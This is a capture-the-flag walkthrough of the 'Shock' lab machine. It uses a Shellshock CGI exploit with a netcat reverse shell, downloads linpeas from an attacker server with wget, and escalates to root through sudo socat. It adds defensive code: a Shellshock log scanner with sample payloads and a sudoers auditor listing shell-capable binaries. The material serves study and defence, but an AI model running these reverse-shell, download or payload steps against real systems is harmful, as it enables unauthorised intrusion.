# Shock

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-097d749cebd72974f19b283e9a48b1b38c804e8a%2Fimage.png?alt=media)

## Nmap

```
nmap 172.31.1.3 -p- -A

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:ee:09:94:d5:4b:4a:d9:3b:95:3a:d6:63:e7:98:6f (RSA)
|   256 b9:f8:52:aa:62:02:af:6c:09:ca:dc:3e:7b:b3:94:b7 (ECDSA)
|_  256 53:5d:98:f7:61:e0:57:df:38:96:f9:be:59:77:6c:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Steak House Shock
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## FTP

Looking at our Nmap results, we can start with a check for anonymous login on FTP.

```
nmap 172.31.1.3 --script=ftp-anon.nse -p 21

PORT   STATE SERVICE
21/tcp open  ftp
```

The script gives no feedback about anonymous login, so a manual check is required.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b2b6a45817b274501bd18dc7dd16b5841ed2320%2Fimage.png?alt=media)

As anonymous login is not allowed on this server, we can check for exploits against vsFTPd 3.0.3 using searchsploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9441af4d7b303588b44ae2e3d37262df952312a4%2Fimage.png?alt=media)

I also searched Google and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80, since this is our next best logical attack vector.

## HTTP

![http://172.31.1.3/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-733fd159ac7aff30506096af0304f63ca7c036b1%2Fimage.png?alt=media)

I have also started a scan with Nikto on this webpage.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8626b75aa3943fbeb4a6ed9d95f4878bffaa32b4%2Fimage.png?alt=media)

## Exploitation

Nikto reports that /cgi-bin/test.cgi is possibly vulnerable to the Shellshock exploit (CVE-2014-6271). A brief overview of what it is is taken from [www.netsparker.com](https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c16992d1a0734c5871c71e97c0dd5a897256bff2%2Fimage.png?alt=media)
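For the defensive side of the same finding, the following added example (not part of the original writeup or of any tool it mentions) scans Apache "combined" format access log lines for the `() {` function-definition prefix that every CVE-2014-6271 payload needs, in the three request fields that format records. The log lines are constructed for the example; the field names, regexes and `find_shellshock` function are my own.

```python
import re

# Apache "combined" log format. The request line, referer and user-agent are
# the only attacker-controlled fields this format records, so they are where an
# HTTP-borne Shellshock payload would show up in the log.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# CVE-2014-6271 is triggered by an environment value that starts with a bash
# function definition, "() {", with commands appended after the closing brace.
# Whitespace between the tokens is flexible, so the pattern tolerates it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines, not taken from the target in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2020:13:55:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/sleep 5"
10.0.0.9 - - [10/Oct/2020:13:55:41 +0000] "GET /index.html HTTP/1.1" 200 2048 "() { x; }; id" "curl/7.68.0"
10.0.0.7 - - [10/Oct/2020:13:56:02 +0000] "GET /steaks.html HTTP/1.1" 200 1024 "http://example.test/" "Mozilla/5.0"
"""


def parse_combined(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def request_path(request):
    """Extract the path from a request line such as 'GET /x HTTP/1.1'."""
    parts = request.split(" ")
    return parts[1] if len(parts) > 1 else request


def find_shellshock(log_text):
    """Return one finding per log line whose request, referer or user-agent carries a Shellshock prefix."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        rec = parse_combined(line)
        if rec is None:
            continue  # malformed or differently formatted line; skip rather than guess
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append({
                    "line": lineno,
                    "ip": rec["ip"],
                    "path": request_path(rec["request"]),
                    "cgi": request_path(rec["request"]).startswith("/cgi-bin/"),
                    "field": field,
                    "value": rec[field],
                })
                break  # one finding per line is enough for triage
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        flag = "CGI target" if hit["cgi"] else "non-CGI path"
        print(f"line {hit['line']}: {hit['ip']} -> {hit['path']} ({flag}) in {hit['field']}: {hit['value']!r}")
```

The `cgi` flag exists because the prefix in a request to a static page is noise from a scanner, whereas the same prefix aimed at a CGI script is the case that matters. Note the limitation: the combined format does not log arbitrary request headers, so a payload delivered in a header other than Referer or User-Agent will not appear here at all; full coverage needs a WAF or a custom `LogFormat` that records the headers you care about.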

### PoC

Searching for HTTP Shellshock PoCs brings us to the following by zalalov on GitHub.

{% embed url="<https://github.com/zalalov/CVE-2014-6271>" %}

Download the python script and then set up as per the README:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7eaf214c62b89dee478dbcdf36875b8a79965d67%2Fimage.png?alt=media)

Start a netcat listener on the attacking machine.

```
nc -lvp 4444
```

Then call the Python script with the correct arguments for our machine.

```
python2 shellshock.py 172.31.1.3 /cgi-bin/test.cgi <AttackingIP>/4444
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3730cc0a2a26a25c9f26ed3cb9445efa65375b2%2Fimage.png?alt=media)

After a short amount of time we should get a shell back on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-337bad1b7eaadbc0379c7152fd6d2670195abcac%2Fimage.png?alt=media)

From here we can upgrade the shell we currently have to a proper TTY.

```
/usr/bin/script -qc /bin/bash /dev/null
```

## Privilege Escalation

Next I uploaded linpeas.sh to look for any easy privilege escalation vectors. I started a Python SimpleHTTPServer on my attacking machine in the directory holding my Linux enumeration scripts.

```
python2 -m SimpleHTTPServer 80
```

I then performed `wget` on the target file.

```
wget http://<IP>:<Port>/<File>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-50433a48551871d77a2b8f0a051be4f4004b2416%2Fimage.png?alt=media)

Once the download completed I executed linpeas.sh and waited for it to finish. In its output we see that we can run socat using sudo.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-11a9becf57de4fbbe7d1324097dd4b75a10a3f25%2Fimage.png?alt=media)

Looking at socat on [GTFOBins](https://gtfobins.github.io/gtfobins/socat/) we see we can call bash with root permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-97c4f609b0a40a817e8d6a280940c2411357eea7%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9b0862607b99ad32246888166426073bf8660f24%2Fimage.png?alt=media)

We are now root on the target machine.
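The root cause of this escalation is a sudo rule that lets an unprivileged account run a shell-capable binary. The following added example (my own code, not from the writeup or from GTFOBins) parses a sudoers file and flags rules whose command is one of the binaries GTFOBins documents as able to spawn a shell under sudo. The sudoers content and the `SHELL_CAPABLE` subset are constructed for the example; the `parse_sudoers` and `audit_sudoers` functions are assumptions of mine, not an existing tool.

```python
import re
import shlex

# A constructed subset of the binaries GTFOBins lists as able to spawn a shell
# or read/write arbitrary files when run through sudo. Extend for real audits.
SHELL_CAPABLE = {
    "socat", "bash", "sh", "vim", "vi", "less", "more", "find", "awk",
    "python", "python2", "python3", "perl", "env", "nmap", "tar", "zip",
}

# Constructed sudoers content; not the target's real /etc/sudoers.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults    env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /usr/bin/socat
backup  ALL=(ALL) NOPASSWD: /usr/bin/tar -czf /var/backups/www.tgz /var/www
alice   ALL=(ALL) /usr/bin/systemctl restart apache2
"""

# who  hosts = (runas) TAG: cmd1, cmd2 ...   (the common single-line rule shape)
RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<hosts>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$'
)


def parse_sudoers(text):
    """Return one dict per (user, command) pair found in simple sudoers rules."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                                 # aliases, includes, etc. are out of scope here
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            rules.append({
                "who": m.group("who"),
                "runas": m.group("runas") or "root",  # sudo's default target user
                "nopasswd": "NOPASSWD" in tags,
                "cmd": cmd.strip(),
            })
    return rules


def audit_sudoers(text):
    """Flag rules that hand a shell-capable binary to a user, with a rough severity."""
    findings = []
    for r in parse_sudoers(text):
        if r["cmd"] == "ALL":
            continue  # blanket sudo is a policy decision, not a GTFOBins finding
        argv = shlex.split(r["cmd"])
        binary = argv[0].rsplit("/", 1)[-1]
        if binary not in SHELL_CAPABLE:
            continue
        if len(argv) == 1:
            severity = "high"    # no argument restriction: the documented shell recipe works as-is
        elif "*" in r["cmd"]:
            severity = "high"    # wildcard arguments can usually be steered to the same effect
        else:
            severity = "medium"  # fixed arguments; still review for options that run commands
        findings.append({
            "who": r["who"], "runas": r["runas"], "binary": binary,
            "nopasswd": r["nopasswd"], "severity": severity, "cmd": r["cmd"],
        })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        pw = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"[{f['severity']}] {f['who']} may run {f['cmd']} as {f['runas']} ({pw})")
```

Run it against `sudo -l` output reshaped into rule form, or against the sudoers file itself on a host you administer. The socat rule in the sample is the exact shape that gave root in this writeup: an unrestricted shell-capable binary with `NOPASSWD`, which is why it ranks highest, while the tar rule with a fixed argument list is only a review item.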

